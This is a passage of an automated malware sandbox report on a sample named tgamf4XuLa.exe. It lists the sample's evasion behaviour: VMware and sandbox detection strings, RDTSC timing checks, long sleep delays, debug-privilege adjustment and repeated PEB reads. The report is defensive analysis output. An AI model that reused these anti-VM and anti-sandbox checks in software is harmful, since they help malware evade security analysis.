          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: tgamf4XuLa.exe PID: 6056, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002EC85E4 second address: 0000000002EC85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002EC897E second address: 0000000002EC8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 6060Thread sleep time: -44461s >= -30000s
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 5884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4420Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6580Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeThread delayed: delay time: 44461
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.259017685.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.280424051.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000007.00000000.259457359.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000007.00000000.250866247.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000007.00000000.313443511.0000000008815000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&X
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0510A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05103540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05138DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05154015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05154015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05151074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05142073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05103884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05103884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0514131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0515070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0515070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05084F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05084F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05091B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05091B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0513D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05098794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0514138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05155BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
